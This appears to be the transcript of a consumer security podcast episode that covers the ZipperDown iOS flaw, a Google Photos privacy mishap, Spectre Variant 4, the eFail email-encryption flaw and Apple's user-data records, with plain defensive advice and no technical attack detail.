Checklist 93: What’s New in Security News
Welcome to Episode 93 of The Checklist. Today, our attention turns towards security and insecurity — but we’re not talking about a long-lost Jane Austen novel. Instead, we’re taking a tour through the headlines to hit some of the big and interesting stories that have cropped up in the security sector over the past few weeks. Things we’ll be visiting on today’s list include:
- The Zipperdown vulnerability
- Puppy Pictures Preempt Privacy
- The returning specter of Spectre
- eFail: a big bug in email encryption
- What does Apple know about you?
The answer to that last question may surprise you, especially since it is, in fact, a positive story. First, though, we’ll need to wade through some of the bad bits before we can get to the good stuff. Let’s start with the news that perhaps as many as 10% of all the apps available in the App Store could be vulnerable to a newly-discovered exploit.
The Zipperdown vulnerability
News has recently begun to trickle out about a new vulnerability affecting iOS devices that researchers estimate affects nearly 16,000 apps in the store. Details about how the vulnerability actually works are hard to come by so far, but we do know the conditions necessary for the attack to work. Named ZipperDown, researchers at Pangu Lab announced its existence in the middle of May. Describing it as a “common program error,” it seems that it’s a problem with the way apps handle the issue, rather than an actual bug in iOS itself.
The good news is that ZipperDown only works in a highly specific set of circumstances, which the average person isn’t likely to experience. First, the bad guys must be in control of the Wi-Fi network to which you’ve connected your device — not usually an easy task. Secondly, one of the affected apps in question has to run outside of the protections built into iOS, known as the sandbox. If you’d like to brush up on what the sandbox is, you can check out more in Checklist 74, where we covered the general security features of iOS. The only way for an app to run outside the sandbox these days is if you jailbreak your phone.
Only if those two conditions exist can the attackers exploit the vulnerability. If successful, their attack allows them to execute arbitrary code, potentially gaining deeper access to your device and its data. The average person will probably never encounter this, which is a good thing considering how many apps ZipperDown affects. For now, app authors can’t do much to correct the problem if they aren’t alerted to the specifics of the exploit, so perhaps more information is yet to come.
With that said, here’s something that bears repeating, again and again: don’t jailbreak your iOS devices. Not only are you opening yourself to a world of vulnerabilities such as ZipperDown, but you aren’t gaining much in the process. Instead, take advantage of the built-in security features of iOS so you can keep using your devices without worrying.
Puppy Pictures Preempt Privacy
Way back in Episode 67, another one of the shows we did covering iOS security, we spent some time chatting about how Apple limited third party apps’ access to the photo library on your iOS device. It was a very good thing and gave users a level of improved privacy with your personal photos. A recent story that made the rounds in the tech and security sectors have inspired us to spend some time discussing why this step was such a good move, and what goes wrong when apps have unrestricted access to our photos.
Jason Koebler, a reporter for tech publication Motherboard, recently fessed up to making a rather embarrassing mistake: he traded his privacy for a video of a puppy. Who can blame him when a cute video of a dog was on the line? Here’s the story: years ago, Koebler downloaded the Google Photos app, but declined to permit it to access the photo library. Had he done so, Google Photos would have automatically started the process of uploading all the pictures there to Google’s servers. Google then automatically categorizes these pictures by running them through several algorithms for facial and image recognition. That’s the reason he chose to deny permission.
Unused, the app hung around on his phone for years, forgotten about, until Koebler went to a concert and, as one does, had a few drinks while waiting for the show to start. Recalling that a friend of his had recently adopted a new dog, he fired off a text asking for a photo. His friend replied with a cute video — uploaded to and shared from Google Photos. Naturally, Koebler clicked the link, which automatically opened the app.
Here’s the rub: you can’t use Google Photos, even if you only want to view someone else’s upload, without granting it access to use your own pictures. In the moment, Jason chose to grant access, thinking in his inebriated state that he’d simply switch it back off later. Satisfied with the puppy video and with the concert beginning, he put the phone back into his pocket. Again, as one does in these situations, he forgot all about something as simple as that one button press to grant permission — until the next morning.
(An important side note: if you don’t have Google Photos installed on your iOS device and you choose to click a link sent to you from a friend, don’t worry. You can still view the photo or video in your device’s web browser without worrying about handing over your entire photo library.)
When Jason awoke the next morning, he had a pleasant alert on his phone informing him that Google Photos had successfully uploaded all 15,000 images and videos from his photo library. Not wanting all that private information stuck in Google’s cloud, he quickly began an effort to delete them all — but then he found that it was going to be a tedious task indeed. Google only allows you to delete 500 photos at a time — and even then, they weren’t truly deleted yet. Trashed items remain there for 60 days before permanent deletion! Although, like most trash folders, you can go empty the trash immediately (if you remember to do so).
Luckily, there were no real consequences from this incident, but it’s very illustrative of a simple fact: it only takes one mistake to imperil your privacy. That’s why good habits and smart thinking about security should become second nature to you. No puppy video is worth giving Google a chance to train its algorithms on all 15,000 of your personal photos — just wait for an opportunity to open that link somewhere else. Of course, this lesson applies to far more than something like Google Photos. We’re always talking about being vigilant on this show, and this is one of those times when vigilance could’ve come in handy!
The returning specter of Spectre
Remember Spectre, the hard-coded CPU vulnerability that caused consternation and panic when it was announced? If you want a quick look, the site meltdownattack.com sums it up nice and quickly. It says:
Spectre breaks the isolation between different applications. It allows an attacker to trick error-free programs, which follow best practices, into leaking their secrets. In fact, the safety checks of [those] best practices actually increase the attack surface and may make applications more susceptible to Spectre.
That synopsis is a highly simplified explanation of Spectre, but if it sounds scary, that’s because it is. For those who want to revisit the topic or who are just hearing about it for the first time, head back to Episode 73 of the Checklist where we took a deep dive on the subject. 20 weeks after we first discussed it in that episode, Spectre is back in the news with a vengeance.
Since the announcement of Spectre, Intel has been hard at work both regarding addressing Spectre itself and addressing the PR hurricane that the stories generated. “Security flaws affect almost all computers” is not the kind of headline you want related to your company, after all. As a part of these efforts, Intel announced back in February that it had elected to expand its bug bounty program by creating specific rewards for uncovering Spectre-style vulnerabilities that break up the secure running environment in the CPU. Paying hackers to find problems is usually a good way to get results — and Intel seems to have uncovered a new problem now.
Dubbed Spectre Variant 4, it follows the overall framework of a typical Spectre attack, leveraging vulnerabilities in the speculative execution features on Intel chips to leak and expose user data out through a digital side door. For more on speculative execution, be sure to hit Episode 73. So, what makes Variant 4 so notable if it’s the same style of bug? This one has the capability of working in a “language-based runtime environment” — in other words, the kinds of things that power core features on the Web, such as JavaScript. It could mean that critically sensitive data we send over the Internet would be vulnerable to tampering and interception in some situations. There are a few wrinkles to discuss, though.
The good news: Intel so far has no knowledge or evidence of successful exploits taking place in any web browser. Meanwhile, the patches that they produced to mitigate earlier versions of the Spectre flaw should also be effective against Variant 4, rendering it harmless on updated machines. However, the news isn’t all good: many of the upcoming patches and BIOS updates that address Spectre are coming disabled by default, since they can cause an up to 8% decrease in CPU performance — enough for most people to notice.
There’s more bad news, too: in the end, all these fixes are only temporary. Recall that Spectre is not a software bug, but actually a flaw deep in the chip on a practically microscopic level of the hardware. That means permanent fixes don’t exist, and existing chips will always potentially be vulnerable without the patches. We won’t be able to put Spectre to bed for good until the next generation of hardware comes out of Intel’s factories.
Even then, that won’t make all the vulnerable chips disappear forever — they’ll remain at-risk for the remainder of their usable lives. It will take time before those machines get phased out due to obsolescence or upgrades, so this may not be the last time we talk about Spectre. If Intel’s bug bounty program turns up something else, we’ll be sure to revisit the topic.
eFail: the worst dating site, ever
Now let’s turn our attention to email — one of the most basic and revolutionary parts of the Internet, now so commonplace that many of us don’t pay it a second thought. Here on the Checklist, we haven’t yet gone into an in-depth discussion of encryption options for email. Perhaps soon we’ll do an episode covering everything you need to know to lock down your emails, but for today, we’re discussing a big problem affecting email encryption today. This story shows that serious flaws aren’t impossible to find even in highly secure systems designed to be safe from the start; even the most well-built privacy applications can sometimes fail, too.
Pretty Good Privacy, usually known simply as PGP, is considered one of the gold standards for email encryption and has been since the mid-1990s. While not everyone relies on PGP and its related family of encryption protocols, it enjoys widespread popularity in the security sector and among journalists, alongside others. Recently, a group of researchers from both Germany and Belgium announced findings that indicated a serious issue affecting PGP and S/MIME encryption schemes for email.
Called eFail, the flaw allows an attacker to intercept your encrypted email and make a change to how HTML elements in the message will be processed. These common elements could include anything from an embedded image of a puppy to an embedded video from YouTube. Once the attacker intercepts and makes the alteration, the email proceeds on to its intended destination. The receiving user’s email client decrypts the secured message and, unknown to the users, loads the altered HTML elements through the compromised side channel. In the process, the plain text version of the email becomes available to the hacker.
This is another case where the average Joe probably won’t encounter this flaw, as the hacker already needs an extensive amount of digital access to both targets to be able to intercept the messages in transit. That said, most of the people who take the time to learn PGP and put in the effort to use in their daily communications aren’t doing so for fun. These are people who have information they need to protect and keep secret, such as the aforementioned journalists. That would make the extra effort worthwhile, and as we’ve seen in several stories, state-sponsored hacking is a real thing. With the budget and determination of a security agency behind an attacker, eFail could have real-world consequences.
The situation around eFail is evolving. For now, the best suggestions out there for mitigating the potential damage of this attack include applying patches as they become available. Most likely, these patches would come out for the encrypted email plugins used to send and received PGP messages easily. Disabling HTML rendering and formatting in your email client will also cut off access to the vital route the hacker needs to use to get the plain text email. In other words, users who are encrypting their mail should use only plain text — don’t get fancy with complex formatting and pictures, especially those that load from an external server. In other words, shut the digital door and lock it!
What does Apple know about you?
Okay — so enough about Spectres and eFails and jailbreaks, what about the good news we mentioned earlier? It’s time to talk about what Apple knows about you—and here’s the surprise: Apple doesn’t actually know as much about you as you might think. Recently, in Episode 85 of The Checklist, we examined the type of data Facebook collects on every user, and how you can check your records to find out what Facebook knows. Now, we’re curious about how Apple does it — is their public commitment to user privacy for real, or just a facade for good PR?
Near the start of May, the security editor for online publication ZDNet, Zack Whittaker, contacted Apple to ask them for all the data they had stored on him going all the way back to the time of his first iPhone purchase in 2010. Now, this was no little task. Some companies, like Google, Twitter, and Facebook, have crafted tools that automate the process of gathering data and creating an archive of all the information in question. On these sites, that usually takes an hour or less from submitting the request. These archives aren’t small, either, which is why the results aren’t instant. What you get back could be a couple of hundred megabytes to even a few gigabytes of data, dependent on how much the service has collected about you.
Apple, though, doesn’t seem to have such a process in place, given that Whittaker had to contact the Cupertino company on his own. A week later, they had his archive ready, and they sent it back to him. So how big was the archive? 500 MB? 2 GB? 10? No,it actually clocked in at a mere 5 megabytes, no larger than a high-quality picture shot from the latest iPhone. Contained in the archive from Apple were several dozen spreadsheets, most of which contained simple metadata. It was information such as whom he sent text messages to or when he initiated a FaceTime call, alongside the time and date for when he made the calls.
Apple has no record of things you do with Siri, Maps, or News, because they gather all that data anonymously — they have no way of knowing to whom a particularly piece of data belongs. That’s why these archives didn’t include any highly personalised information, and that’s a good thing. However, there are several other interesting items of note that Whittaker discovered, though none are big privacy bombshells. Consider the following list of other things Apple collects on its users:
- Basic account information (Apple ID, home address, phone number, and your name)
- Timestamped logs created each time your device downloads from iCloud (but not the downloaded files themselves)
- Logs indicating whenever your devices interact with your personal iCloud email account
- Device history (for all purchased devices, including their serial numbers, carrier lock status, and other unique identifiers such as
- Bluetooth and Wi-Fi connections)
- Any records of your AppleCare interactions, such as repair request data
- Warranty data, including your AppleCare status
- Logs for all log-in events to iTunes, plus the device you used
- Data related to any interactions you’ve had with the Game Center
- Logs indicating visits to your Apple ID through a web browser
- Logs of password reset requests
- Logs for iTunes Match uploads and downloads
- A total record of your download history, including songs, apps, and more, plus data on the downloading device
As you can see, that’s a lot of info — but none of it is anything particularly concerning for the average user. However, Apple will soon take the time to roll out a tool later this year to come up to speed with other businesses in this area. That means soon, we can all look at just what Apple knows about its users. That’s a big win for privacy and transparency, and it could prove to be an important tool for accountability from Apple.